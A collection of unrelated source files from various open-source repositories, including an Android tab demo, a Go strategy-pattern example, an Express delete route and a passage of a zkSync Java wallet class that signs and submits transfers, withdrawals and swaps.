importance: 0.019450051372393994,
sortOrder: 5
},
{
category: "St. Senator",
importance: 0.03578981589773275,
sortOrder: 4
},
{
category: "St. Representative",
importance: 0.033471046408828774,
sortOrder: 3
},
{
category: "Governor",
importance: 0.012904292200920951,
sortOrder: 2
},
{
category: "Attorney General",
importance: 0.00384018759018759,
sortOrder: 1
}
];
export default electionData;
|
williamschey/redmine_dmsf
|
test/functional/my_controller_test.rb
|
<reponame>williamschey/redmine_dmsf
# Redmine plugin for Document Management System "Features"
#
# Copyright (C) 2013 <NAME> <<EMAIL>>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
require File.expand_path('../../test_helper', __FILE__)
class MyControllerTest < RedmineDmsf::Test::TestCase
include Redmine::I18n
fixtures :users, :user_preferences
def setup
@request.session[:user_id] = 2
end
def test_page_with_open_approvals_block
preferences = User.find(2).pref
preferences[:my_page_layout] = {'top' => ['open_approvals']}
preferences.save!
get :page
assert_response :success
assert_select 'h3', {:text => "#{l(:label_my_open_approvals)} (2)"}
end
def test_page_with_open_locked_documents
preferences = User.find(2).pref
preferences[:my_page_layout] = {'top' => ['locked_documents']}
preferences.save!
get :page
assert_response :success
assert_select 'h3', {:text => "#{l(:label_my_locked_documents)} (0/1)"}
end
end
|
Raffy23/boinc-webmanager
|
shared/src/main/scala/at/happywetter/boinc/shared/websocket/package.scala
|
package at.happywetter.boinc.shared
import upickle.default.macroRW
/**
* Created by:
*
* @author Raphael
* @version 16.07.2019
*/
package object websocket {
sealed trait WebSocketMessage
object SubscribeToGroupChanges extends WebSocketMessage
object UnsubscribeToGroupChanges extends WebSocketMessage
case class HostInformationChanged(hosts: Seq[String], groups: Map[String, List[String]]) extends WebSocketMessage
object ACK extends WebSocketMessage
object NACK extends WebSocketMessage
implicit val hostInformationChangedParser = macroRW[HostInformationChanged]
implicit val webSocketMessageParser = macroRW[WebSocketMessage]
}
|
Hardy-Space/SomeASDemo
|
tablayout_viewpager/src/main/java/com/hardy/person/tablayout_viewpager/MainActivity.java
|
<reponame>Hardy-Space/SomeASDemo
package com.hardy.person.tablayout_viewpager;
import android.graphics.Color;
import android.os.Bundle;
import android.support.design.widget.TabLayout;
import android.support.v4.view.PagerAdapter;
import android.support.v4.view.ViewPager;
import android.support.v7.app.AppCompatActivity;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import java.util.ArrayList;
import java.util.List;
public class MainActivity extends AppCompatActivity implements View.OnClickListener{
//导航条
private TabLayout mTab;
//ViewPager
private ViewPager mPager;
//盛放标题的集合
private List<String> titles = new ArrayList<>();
//盛放ViewPager的显示内容
private List<View> views = new ArrayList<>();
//定义一系列ViewPager要显示的view
View view1,view2,view3,view4,view5,view6;
//实例化view用到的压力泵
private LayoutInflater mLayoutInflater;
//底部状态栏四个TextView
private TextView mAdvice;
private TextView mRank;
private TextView mFind;
private TextView mMine;
private void assignViews() {
mTab = (TabLayout) findViewById(R.id.tab);
mPager = (ViewPager) findViewById(R.id.pager);
mAdvice = (TextView) findViewById(R.id.advice);
mRank = (TextView) findViewById(R.id.rank);
mFind = (TextView) findViewById(R.id.find);
mMine = (TextView) findViewById(R.id.mine);
mLayoutInflater = getLayoutInflater();
view1 = mLayoutInflater.inflate(R.layout.viewpager_content,null);
view2 = mLayoutInflater.inflate(R.layout.viewpager_content,null);
view3 = mLayoutInflater.inflate(R.layout.viewpager_content,null);
view4 = mLayoutInflater.inflate(R.layout.viewpager_content,null);
view5 = mLayoutInflater.inflate(R.layout.viewpager_content,null);
view6 = mLayoutInflater.inflate(R.layout.viewpager_content,null);
views.add(view1);
views.add(view2);
views.add(view3);
views.add(view4);
views.add(view5);
views.add(view6);
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
//找到xml中控件
assignViews();
//添加多个标题
titles.add("No.1");
titles.add("No.2");
titles.add("No.3");
titles.add("No.4");
titles.add("No.5");
titles.add("No.6");
//在此设置成滚轴模式,当Tab太多时会滚动显示,其他模式会挤在屏幕中
mTab.setTabMode(TabLayout.MODE_SCROLLABLE);
//设置文字下边的选择提示条颜色
mTab.setSelectedTabIndicatorColor(Color.BLUE);
//设置背景色
mTab.setBackgroundColor(Color.BLACK);
//设置文字颜色,第一个参数是未选择状态下的文字颜色,第二个是已选择状态下的文字颜色
mTab.setTabTextColors(Color.WHITE, Color.RED);
//添加标签
mTab.addTab(mTab.newTab().setText(titles.get(0)));
mTab.addTab(mTab.newTab().setText(titles.get(1)));
mTab.addTab(mTab.newTab().setText(titles.get(2)));
mTab.addTab(mTab.newTab().setText(titles.get(3)));
mTab.addTab(mTab.newTab().setText(titles.get(4)));
mTab.addTab(mTab.newTab().setText(titles.get(5)));
//设置ViewPager的适配器
MyViewpagerAdapter myViewpagerAdapter = new MyViewpagerAdapter(views);
mPager.setAdapter(myViewpagerAdapter);
//将TabLayout和ViewPager关联在一起
mTab.setupWithViewPager(mPager);
//为TextView设置点击监听器
mAdvice.setOnClickListener(this);
mRank.setOnClickListener(this);
mFind.setOnClickListener(this);
mMine.setOnClickListener(this);
}
@Override
public void onClick(View v) {
switch (v.getId()){
case R.id.advice:
mAdvice.setSelected(true);
mRank.setSelected(false);
mFind.setSelected(false);
mMine.setSelected(false);
break;
case R.id.rank:
mAdvice.setSelected(false);
mRank.setSelected(true);
mFind.setSelected(false);
mMine.setSelected(false);
break;
case R.id.find:
mAdvice.setSelected(false);
mRank.setSelected(false);
mFind.setSelected(true);
mMine.setSelected(false);
break;
case R.id.mine:
mAdvice.setSelected(false);
mRank.setSelected(false);
mFind.setSelected(false);
mMine.setSelected(true);
break;
}
}
class MyViewpagerAdapter extends PagerAdapter{
private List<View> list ;
public MyViewpagerAdapter(List<View> list) {
this.list = list;
}
//必须重写
@Override
public int getCount() {
return list.size();
}
//必须重写
@Override
public boolean isViewFromObject(View view, Object object) {
//官方推荐写法
return view == object;
}
//显示viewpager显示内容
@Override
public Object instantiateItem(ViewGroup container, int position) {
//添加显示的页卡,最好添加Fragment作为内容
container.addView(views.get(position));
return views.get(position);
}
//删除页卡
@Override
public void destroyItem(ViewGroup container, int position, Object object) {
container.removeView(views.get(position));
}
//设置标题
@Override
public CharSequence getPageTitle(int position) {
return titles.get(position);
}
}
}
|
zhulcher/larcv3
|
tests/larcv/core/dataformat/test_write_image2d.py
|
<gh_stars>1-10
# import pytest
# import unittest
# import larcv
# from larcv import data_generator
# from random import Random
# random = Random()
# #
# # For backward compatibility, otherwise see test_write_tensor.py
# #
# @pytest.fixture()
# def rand_num_events():
# return random.randint(1, 5)
# # def write_image2d(tempfile, event_image_list):
# # io_manager = larcv.IOManager(larcv.IOManager.kWRITE)
# # io_manager.set_out_file(tempfile)
# # io_manager.initialize()
# # for event in range(len(event_image_list)):
# # io_manager.set_id(1001, 0, event)
# # images = event_image_list[event]
# # # Get a piece of data, image2d:
# # ev_image2d = larcv.EventImage2D.to_image2d(io_manager.get_data("image2d","test"))
# # for projection in range(len(images)):
# # image2d = larcv.as_image2d(images[projection])
# # ev_image2d.append(image2d)
# # io_manager.save_entry()
# # print("Finished event loop")
# # # assert(io_manager.get_n_entries_out() == rand_num_events)
# # io_manager.finalize()
# # return
# # def read_image2d(tempfile):
# # from copy import copy
# # io_manager = larcv.IOManager(larcv.IOManager.kREAD)
# # io_manager.add_in_file(tempfile)
# # io_manager.initialize()
# # event_image_list = []
# # for i in range(io_manager.get_n_entries()):
# # event_image_list.append([])
# # io_manager.read_entry(i)
# # # Get a piece of data, sparse tensor:
# # ev_image2d = larcv.EventImage2D.to_image2d(io_manager.get_data("image2d","test"))
# # print("Number of images read: ", ev_image2d.as_vector().size())
# # for projection in range(ev_image2d.as_vector().size()):
# # image = larcv.as_ndarray(ev_image2d.as_vector()[projection])
# # event_image_list[i].append(copy(image))
# # return event_image_list
# # def build_image2d(rand_num_events, n_projections):
# # from larcv import larcv
# # import numpy
# # event_image_list = []
# # for i in range(rand_num_events):
# # event_image_list.append([])
# # # Get a piece of data, image2d:
# # for projection in range(n_projections):
# # shape = []
# # for dim in range(2):
# # shape.append(random.randint(1, 1e3))
# # raw_image = numpy.random.random(shape).astype("float32")
# # event_image_list[i].append(raw_image)
# # return event_image_list
# @pytest.mark.parametrize('n_projections', [1,2,3])
# def test_write_image2d(tmpdir, rand_num_events, n_projections):
# event_image_list = data_generator.build_image2d(rand_num_events, n_projections = n_projections)
# random_file_name = str(tmpdir + "/test_write_image2d.h5")
# data_generator.write_image2d(random_file_name, event_image_list)
# @pytest.mark.parametrize('n_projections', [1,2,3])
# def test_write_read_image2d(tmpdir, rand_num_events, n_projections):
# import numpy
# random_file_name = str(tmpdir + "/test_write_read_image2d.h5")
# event_image_list = data_generator.build_image2d(rand_num_events, n_projections = n_projections)
# data_generator.write_image2d(random_file_name, event_image_list)
# read_event_image_list = data_generator.read_image2d(random_file_name)
# # Check the same number of events came back:
# assert(len(read_event_image_list) == rand_num_events)
# for event in range(rand_num_events):
# # Check the same number of projections per event:
# assert(len(read_event_image_list[event]) == len(event_image_list[event]))
# for projection in range(n_projections):
# # Check the same number of voxels:
# input_image = event_image_list[event][projection]
# read_image = read_event_image_list[event][projection]
# assert(numpy.sum(input_image) - numpy.sum(read_image) < 1e-3)
# assert(numpy.sum(numpy.fabs(input_image)) - numpy.sum(numpy.fabs(read_image)) < 1e-3)
# assert(input_image.shape == read_image.shape)
# assert(numpy.mean(input_image - read_image) < 1e-3)
# if __name__ == '__main__':
# tmpdir = "./"
# rand_num_events = 10
# n_projections = 3
# test_write_read_image2d(tmpdir, rand_num_events, n_projections)
|
imh0t3mp/GeekBrains_Java
|
task_rest/src/main/java/name/imh0t3mp/course/geekbrains/task_tracker/repo/TaskRepository.java
|
package name.imh0t3mp.course.geekbrains.task_tracker.repo;
import name.imh0t3mp.course.geekbrains.task_tracker.entity.Task;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.JpaSpecificationExecutor;
import org.springframework.data.repository.PagingAndSortingRepository;
import org.springframework.stereotype.Repository;
import javax.transaction.Transactional;
import java.util.List;
@Repository
@Transactional
public interface TaskRepository extends
JpaRepository<Task, Integer>,
PagingAndSortingRepository<Task, Integer>,
JpaSpecificationExecutor<Task> {
List<Task> findTaskByOwner_Username(String ownerName);
List<Task> findTaskByPerformer_Username(String performerName);
List<Task> findTaskByStatus(String status);
}
|
Surya-98/Snapcuit
|
NGSpice/ngspice-30/src/spicelib/devices/csw/cswmask.c
|
<filename>NGSpice/ngspice-30/src/spicelib/devices/csw/cswmask.c
/**********
Copyright 1990 Regents of the University of California. All rights reserved.
Author: 1987 <NAME>
**********/
/*
* This routine gives access to the internal model parameters
* of Current controlled SWitch
*/
#include "ngspice/ngspice.h"
#include "ngspice/cktdefs.h"
#include "ngspice/devdefs.h"
#include "ngspice/ifsim.h"
#include "cswdefs.h"
#include "ngspice/sperror.h"
#include "ngspice/suffix.h"
int
CSWmAsk(CKTcircuit *ckt, GENmodel *inst, int which, IFvalue *value)
{
CSWmodel *here = (CSWmodel *) inst;
NG_IGNORE(ckt);
switch (which) {
case CSW_RON:
value->rValue = here->CSWonResistance;
return OK;
case CSW_ROFF:
value->rValue = here->CSWoffResistance;
return OK;
case CSW_ITH:
value->rValue = here->CSWiThreshold;
return OK;
case CSW_IHYS:
value->rValue = here->CSWiHysteresis;
return OK;
case CSW_GON:
value->rValue = here->CSWonConduct;
return OK;
case CSW_GOFF:
value->rValue = here->CSWoffConduct;
return OK;
default:
return E_BADPARM;
}
}
|
git4wht/cloudbreak
|
orchestrator-salt/src/main/java/com/sequenceiq/cloudbreak/orchestrator/salt/poller/checker/StateRunner.java
|
package com.sequenceiq.cloudbreak.orchestrator.salt.poller.checker;
import java.util.Set;
import com.sequenceiq.cloudbreak.common.orchestration.Node;
import com.sequenceiq.cloudbreak.orchestrator.salt.client.SaltConnector;
import com.sequenceiq.cloudbreak.orchestrator.salt.client.target.HostList;
import com.sequenceiq.cloudbreak.orchestrator.salt.poller.BaseSaltJobRunner;
import com.sequenceiq.cloudbreak.orchestrator.salt.states.SaltStates;
public class StateRunner extends BaseSaltJobRunner {
//CHECKSTYLE:OFF
protected final String state;
//CHECKSTYLE:ON
public StateRunner(Set<String> targetHostnames, Set<Node> allNode, String state) {
super(targetHostnames, allNode);
this.state = state;
}
@Override
public String submit(SaltConnector saltConnector) throws SaltJobFailedException {
HostList targets = new HostList(getTargetHostnames());
return SaltStates.applyState(saltConnector, state, targets).getJid();
}
@Override
public String toString() {
return "StateRunner{" + super.toString() + ", state: " + this.state + "}'";
}
public String getState() {
return state;
}
}
|
Sampaguitas/pdb_server
|
routes/doctype/delete.js
|
<gh_stars>1-10
const express = require('express');
const router = express.Router();
const DocType = require('../../models/DocType');
router.delete('/', (req, res) => {
const id = req.query.id
DocType.findByIdAndDelete(id, function (err, doctype) {
if (err) {
return res.status(400).json({ message: 'An error has occured' });
} else if (!doctype) {
return res.status(400).json({ message: 'Could not find DocType.' });
} else {
return res.status(200).json({ message: 'DocType has successfully been deleted.' });
}
});
});
module.exports = router;
|
Gitman1989/chromium
|
chrome/browser/views/extensions/browser_action_overflow_menu_controller.h
|
// Copyright (c) 2010 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROME_BROWSER_VIEWS_EXTENSIONS_BROWSER_ACTION_OVERFLOW_MENU_CONTROLLER_H_
#define CHROME_BROWSER_VIEWS_EXTENSIONS_BROWSER_ACTION_OVERFLOW_MENU_CONTROLLER_H_
#pragma once
#include "chrome/browser/ui/views/extensions/browser_action_overflow_menu_controller.h"
// TODO(beng): remove this file once all includes have been updated.
#endif // CHROME_BROWSER_VIEWS_EXTENSIONS_BROWSER_ACTION_OVERFLOW_MENU_CONTROLLER_H_
|
lechium/tvOS145Headers
|
System/Library/PrivateFrameworks/AppleMediaServices.framework/AMSFraudScoreService.h
|
/*
* This header is generated by classdump-dyld 1.5
* on Wednesday, April 28, 2021 at 9:10:56 PM Mountain Standard Time
* Operating System: Version 14.5 (Build 18L204)
* Image Source: /System/Library/PrivateFrameworks/AppleMediaServices.framework/AppleMediaServices
* classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by <NAME>. Updated by <NAME>.
*/
@interface AMSFraudScoreService : NSObject
+(id)cacheFraudScore:(id)arg1 forPurchaseInfo:(id)arg2 ;
+(id)cachedFraudScoreForPurchaseInfo:(id)arg1 ;
+(id)generateFraudScoreForAction:(unsigned long long)arg1 account:(id)arg2 logKey:(id)arg3 ;
@end
|
Danny5487401/go_advanced_code
|
chapter09_design_pattern/03_motion/06_strategyMethod/01_example1/main.go
|
package main
import "fmt"
// Strategy 模式应用场景,在我们写的程序中,大多有if else的条件语句基本上都适合
// Strategy 模式,但是if else 条件的情况是不变的,则不适合此模式,例如一周7天
// Strategy 及其子类为组建提供了一系列可重用的算法,从而使得类型在运行时方便的根据
// 需要在各个算法之间进行切换
//一般的做法
/*
type API struct {
}
// 这个主题时变化不稳定的,没有可扩展性
func (a *API) Recognition(name string_test){
if name == "ali"{
fmt.Println("ali api调用")
}else if name == "baidu"{
fmt.Println("baidu api调用")
}else if name == "xunfei"{
fmt.Println("xunfei api调用")
}
//...如果有其他新的在此添加
}
*/
// ====================下面是用Strategy设计模式=====================
// ==============稳定===============
// IAPI 定义一个api接口,添加一个抽象方法 Recognition()
type IAPI interface {
Recognition()
}
type API struct {
// 这里个人认为不是继承而是组合,在重构关键技法中这也是一种提倡做法,继承——>组合
iapi IAPI
}
func (a *API) OnProgress() {
// 运行时动态改变
a.iapi.Recognition()
}
func (a *API) SetRecognition(t string) {
switch t {
case "ali":
a.iapi = new(Ali)
case "baidu":
a.iapi = new(Bai)
}
}
func (a *API) GetRecognition() {
a.iapi.Recognition()
}
// ==============变化可扩展的==================
// ali 接口
type Ali struct {
}
// 实现Recognition()抽象方法
func (a *Ali) Recognition() {
fmt.Println("ali api 调用")
}
// bai 接口
type Bai struct {
}
// 实现Recognition()抽象方法
func (b *Bai) Recognition() {
fmt.Println("baidu api 调用")
}
func main() {
// 当然如果要彻底解决if else 的问题, 还需要工厂模式进行配合使用
// 这里就不增加工厂模式,只是一个纯粹的strategy模式
api := new(API)
//使用阿里
api.SetRecognition("ali")
api.GetRecognition()
//使用百度
api.SetRecognition("baidu")
api.GetRecognition()
}
|
github-allen/keystone
|
src/main/scala/keystoneml/nodes/images/RandomImageTransformer.scala
|
<reponame>github-allen/keystone<filename>src/main/scala/keystoneml/nodes/images/RandomImageTransformer.scala
package keystoneml.nodes.images
import org.apache.spark.rdd.RDD
import keystoneml.utils.{ImageUtils, Image}
import keystoneml.workflow.Transformer
/**
* Transform an image with the given probability
*
* @param chance probability that an image should be transformed
* @param transform function to apply to image
* @return transformed image or original image
*/
case class RandomImageTransformer(
chance: Double,
transform: Image => Image,
seed: Long = 12334L) extends Transformer[Image, Image] {
val rnd = new java.util.Random(seed)
def apply(im: Image): Image = {
val flip = rnd.nextDouble()
if (flip < chance) {
transform(im)
} else {
im
}
}
}
|
zksync-sdk/zksync-java
|
src/main/java/io/zksync/wallet/DefaultZkSyncWallet.java
|
package io.zksync.wallet;
import io.reactivex.annotations.Nullable;
import io.zksync.domain.TimeRange;
import io.zksync.domain.auth.ChangePubKeyOnchain;
import io.zksync.domain.auth.ChangePubKeyVariant;
import io.zksync.domain.auth.Toggle2FA;
import io.zksync.domain.fee.TransactionFee;
import io.zksync.domain.state.AccountState;
import io.zksync.domain.swap.Order;
import io.zksync.domain.token.NFT;
import io.zksync.domain.token.Token;
import io.zksync.domain.token.TokenId;
import io.zksync.domain.token.Tokens;
import io.zksync.domain.transaction.*;
import io.zksync.ethereum.DefaultEthereumProvider;
import io.zksync.ethereum.EthereumProvider;
import io.zksync.ethereum.wrappers.ZkSync;
import io.zksync.exception.ZkSyncException;
import io.zksync.provider.DefaultProvider;
import io.zksync.provider.Provider;
import io.zksync.signer.EthSignature;
import io.zksync.signer.EthSigner;
import io.zksync.signer.ZkSigner;
import io.zksync.transport.ZkSyncTransport;
import lombok.Getter;
import lombok.SneakyThrows;
import java.math.BigInteger;
import java.util.Arrays;
import java.util.List;
import java.util.Objects;
import java.util.stream.Collectors;
import org.apache.commons.lang3.tuple.Pair;
import org.web3j.protocol.Web3j;
import org.web3j.tuples.generated.Tuple2;
import org.web3j.tx.gas.ContractGasProvider;
import org.web3j.utils.Strings;
public class DefaultZkSyncWallet<A extends ChangePubKeyVariant, S extends EthSigner<A>> implements ZkSyncWallet {
private S ethSigner;
private ZkSigner zkSigner;
@Getter
private Provider provider;
private Integer accountId;
private String pubKeyHash;
DefaultZkSyncWallet(S ethSigner, ZkSigner zkSigner, Provider provider) {
this.ethSigner = ethSigner;
this.zkSigner = zkSigner;
this.provider = provider;
this.accountId = null;
this.pubKeyHash = null;
}
public static <A extends ChangePubKeyVariant, S extends EthSigner<A>> DefaultZkSyncWallet<A, S> build(S ethSigner, ZkSigner zkSigner, ZkSyncTransport transport) {
return new DefaultZkSyncWallet<>(ethSigner, zkSigner, new DefaultProvider(transport));
}
public static <A extends ChangePubKeyVariant, S extends EthSigner<A>> DefaultZkSyncWallet<A, S> build(S ethSigner, ZkSigner zkSigner, Provider provider) {
return new DefaultZkSyncWallet<>(ethSigner, zkSigner, provider);
}
@Override
public String setSigningKey(TransactionFee fee, Integer nonce, boolean onchainAuth, TimeRange timeRange) {
if (isSigningKeySet()) {
throw new ZkSyncException("Current signing key is already set");
}
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
if (onchainAuth) {
final SignedTransaction<ChangePubKey<ChangePubKeyOnchain>> signedTx = buildSignedChangePubKeyTxOnchain(fee, nonceToUse, timeRange);
return submitSignedTransaction(signedTx.getTransaction(), null, false);
} else {
final SignedTransaction<ChangePubKey<A>> signedTx = buildSignedChangePubKeyTx(fee, nonceToUse, timeRange);
return submitSignedTransaction(signedTx.getTransaction(), null, false);
}
}
@Override
public String syncTransfer(String to, BigInteger amount, TransactionFee fee, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<Transfer> signedTransfer = buildSignedTransferTx(to, fee.getFeeToken(), amount,
fee.getFee(), nonceToUse, timeRange);
return submitSignedTransaction(signedTransfer.getTransaction(), signedTransfer.getEthereumSignature());
}
@Override
public String syncWithdraw(String ethAddress, BigInteger amount, TransactionFee fee, Integer nonce,
boolean fastProcessing, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<Withdraw> signedWithdraw = buildSignedWithdrawTx(ethAddress, fee.getFeeToken(), amount,
fee.getFee(), nonceToUse, timeRange);
return submitSignedTransaction(signedWithdraw.getTransaction(), signedWithdraw.getEthereumSignature()[0],
fastProcessing);
}
@Override
public String syncForcedExit(String target, TransactionFee fee, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<ForcedExit> signedForcedExit = buildSignedForcedExitTx(target, fee.getFeeToken(),
fee.getFee(), nonceToUse, timeRange);
return submitSignedTransaction(signedForcedExit.getTransaction(), signedForcedExit.getEthereumSignature());
}
@Override
public String syncMintNFT(String recipient, String contentHash, TransactionFee fee, Integer nonce) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<MintNFT> signedMintNFT = buildSignedMintNFTTx(recipient, contentHash, fee.getFeeToken(),
fee.getFee(), nonceToUse);
return submitSignedTransaction(signedMintNFT.getTransaction(), signedMintNFT.getEthereumSignature());
}
@Override
public String syncWithdrawNFT(String to, NFT token, TransactionFee fee, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<WithdrawNFT> signedWithdrawNFT = buildSignedWithdrawNFTTx(to, token, fee.getFeeToken(), fee.getFee(), nonceToUse, timeRange);
return submitSignedTransaction(signedWithdrawNFT.getTransaction(), signedWithdrawNFT.getEthereumSignature());
}
@SneakyThrows
@Override
public List<String> syncTransferNFT(String to, NFT token, TransactionFee fee, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final Tokens tokens = provider.getTokens();
final Token feeToken = tokens.getTokenBySymbol(fee.getFeeToken()) != null ?
tokens.getTokenBySymbol(fee.getFeeToken()) : tokens.getTokenByAddress(fee.getFeeToken());
final Transfer transferNft = Transfer
.builder()
.accountId(this.getAccountId())
.from(ethSigner.getAddress())
.to(to)
.token(token.getId())
.tokenId(token)
.amount(BigInteger.ONE)
.nonce(nonceToUse)
.fee(BigInteger.ZERO.toString())
.timeRange(timeRange)
.build();
final Transfer transferFee = Transfer
.builder()
.accountId(this.getAccountId())
.from(ethSigner.getAddress())
.to(ethSigner.getAddress())
.token(feeToken.getId())
.tokenId(feeToken)
.amount(BigInteger.ZERO)
.nonce(nonceToUse + 1)
.fee(fee.getFee().toString())
.timeRange(timeRange)
.build();
EthSignature ethSignature = ethSigner.signBatch(Arrays.asList(transferNft, transferFee), nonceToUse, feeToken, fee.getFee()).get();
return submitSignedBatch(Arrays.asList(
zkSigner.signTransfer(transferNft),
zkSigner.signTransfer(transferFee)
), ethSignature);
}
@Override
public String syncSwap(Order order1, Order order2, BigInteger amount1, BigInteger amount2, TransactionFee fee, Integer nonce) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
final SignedTransaction<Swap> signedSwap = buildSignedSwapTx(order1, order2, amount1, amount2, fee.getFeeToken(), fee.getFee(), nonceToUse);
return submitSignedTransaction(signedSwap.getTransaction(), signedSwap.getEthereumSignature()[0], order1.getEthereumSignature(), order2.getEthereumSignature());
}
@Override
@SneakyThrows
public <T extends TokenId> Order buildSignedOrder(String recipient, T sell, T buy, Tuple2<BigInteger, BigInteger> ratio, BigInteger amount, Integer nonce, TimeRange timeRange) {
final Integer nonceToUse = nonce == null ? getNonce() : nonce;
Order order = Order.builder()
.accountId(this.getAccountId())
.amount(amount)
.recipientAddress(recipient)
.tokenSell(sell.getId())
.tokenBuy(buy.getId())
.ratio(ratio)
.nonce(nonceToUse)
.timeRange(timeRange)
.build();
final EthSignature ethSignature = ethSigner.signOrder(order, sell, buy).get();
order.setEthereumSignature(ethSignature);
return zkSigner.signOrder(order);
}
@Override
@SneakyThrows
public <T extends TokenId> Order buildSignedLimitOrder(String recipient, T sell, T buy, Tuple2<BigInteger, BigInteger> ratio,
Integer nonce, TimeRange timeRange) {
return this.buildSignedOrder(recipient, sell, buy, ratio, BigInteger.ZERO, nonce, timeRange);
}
@Override
public AccountState getState() {
return provider.getState(ethSigner.getAddress());
}
@Override
public boolean isSigningKeySet() {
return Objects.equals(this.getPubKeyHash(), this.zkSigner.getPublicKeyHash());
}
@Override
public Integer getAccountId() {
if (this.accountId == null) {
this.loadAccountInfo();
}
return this.accountId;
}
@Override
public String getPubKeyHash() {
if (this.pubKeyHash == null) {
this.loadAccountInfo();
}
return this.pubKeyHash;
}
@Override
public EthereumProvider createEthereumProvider(Web3j web3j, ContractGasProvider contractGasProvider) {
String contractAddress = this.provider.contractAddress().getMainContract();
ZkSync contract = ZkSync.load(contractAddress, web3j, this.ethSigner.getTransactionManager(), contractGasProvider);
DefaultEthereumProvider ethereum = new DefaultEthereumProvider(web3j, this.ethSigner, contract);
return ethereum;
}
@Override
public String getAddress() {
return this.ethSigner.getAddress();
}
@Override
public Tokens getTokens() {
return this.provider.getTokens();
}
@Override
public boolean enable2FA() {
final Long timestamp = System.currentTimeMillis();
final Integer accountId = this.getAccountId();
final EthSignature ethSignature = ethSigner.signToggle(true, timestamp).join();
final Toggle2FA toggle2Fa = new Toggle2FA(
true,
accountId,
timestamp,
ethSignature,
null
);
return provider.toggle2FA(toggle2Fa);
}
@Override
public boolean disable2FA(@Nullable String pubKeyHash) {
final Long timestamp = System.currentTimeMillis();
final Integer accountId = this.getAccountId();
final EthSignature ethSignature = (
Strings.isEmpty(pubKeyHash) ?
ethSigner.signToggle(false, timestamp) :
ethSigner.signToggle(false, timestamp, pubKeyHash)
).join();
final Toggle2FA toggle2Fa = new Toggle2FA(
false,
accountId,
timestamp,
ethSignature,
pubKeyHash
);
return provider.toggle2FA(toggle2Fa);
}
@SneakyThrows
private SignedTransaction<ChangePubKey<A>> buildSignedChangePubKeyTx(TransactionFee fee, Integer nonce,
TimeRange timeRange) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Token token = provider.getTokens().getToken(fee.getFeeToken());
final ChangePubKey<A> changePubKey = ChangePubKey
.<A>builder()
.accountId(this.getAccountId())
.account(ethSigner.getAddress())
.newPkHash(zkSigner.getPublicKeyHash())
.nonce(nonce).feeToken(token.getId())
.fee(fee.getFee().toString())
.timeRange(timeRange)
.build();
final ChangePubKey<A> changePubKeyAuth = ethSigner.signAuth(changePubKey).get();
EthSignature ethSignature = ethSigner.signTransaction(changePubKey, nonce, token, fee.getFee()).get();
return new SignedTransaction<>(zkSigner.signChangePubKey(changePubKeyAuth), ethSignature);
}
@SneakyThrows
private SignedTransaction<ChangePubKey<ChangePubKeyOnchain>> buildSignedChangePubKeyTxOnchain(TransactionFee fee, Integer nonce,
TimeRange timeRange) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Token token = provider.getTokens().getToken(fee.getFeeToken());
final ChangePubKey<ChangePubKeyOnchain> changePubKey = ChangePubKey
.<ChangePubKeyOnchain>builder()
.accountId(this.getAccountId())
.account(ethSigner.getAddress())
.newPkHash(zkSigner.getPublicKeyHash())
.nonce(nonce).feeToken(token.getId())
.fee(fee.getFee().toString())
.ethAuthData(new ChangePubKeyOnchain())
.timeRange(timeRange)
.build();
return new SignedTransaction<>(zkSigner.signChangePubKey(changePubKey));
}
@SneakyThrows
private SignedTransaction<Transfer> buildSignedTransferTx(String to,
String tokenIdentifier,
BigInteger amount,
BigInteger fee,
Integer nonce,
TimeRange timeRange) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Tokens tokens = provider.getTokens();
final Token token = tokens.getTokenBySymbol(tokenIdentifier) != null ?
tokens.getTokenBySymbol(tokenIdentifier) : tokens.getTokenByAddress(tokenIdentifier);
final Transfer transfer = Transfer
.builder()
.accountId(this.getAccountId())
.from(ethSigner.getAddress())
.to(to)
.token(token.getId())
.amount(amount)
.nonce(nonce)
.fee(fee.toString())
.timeRange(timeRange)
.build();
final EthSignature ethSignature = ethSigner.signTransaction(transfer, nonce, token, fee).get();
return new SignedTransaction<>(zkSigner.signTransfer(transfer), ethSignature);
}
@SneakyThrows
private SignedTransaction<Withdraw> buildSignedWithdrawTx(String to, String tokenIdentifier, BigInteger amount, BigInteger fee, Integer nonce, TimeRange timeRange) {
if (zkSigner == null) {
throw new Error("ZKSync signer is required for current pubkey calculation.");
}
final Tokens tokens = provider.getTokens();
final Token token = tokens.getTokenBySymbol(tokenIdentifier) != null ?
tokens.getTokenBySymbol(tokenIdentifier) : tokens.getTokenByAddress(tokenIdentifier);
final Withdraw withdraw = Withdraw
.builder()
.accountId(this.getAccountId())
.from(ethSigner.getAddress())
.to(to)
.token(token.getId())
.amount(amount)
.nonce(nonce)
.fee(fee.toString())
.timeRange(timeRange)
.build();
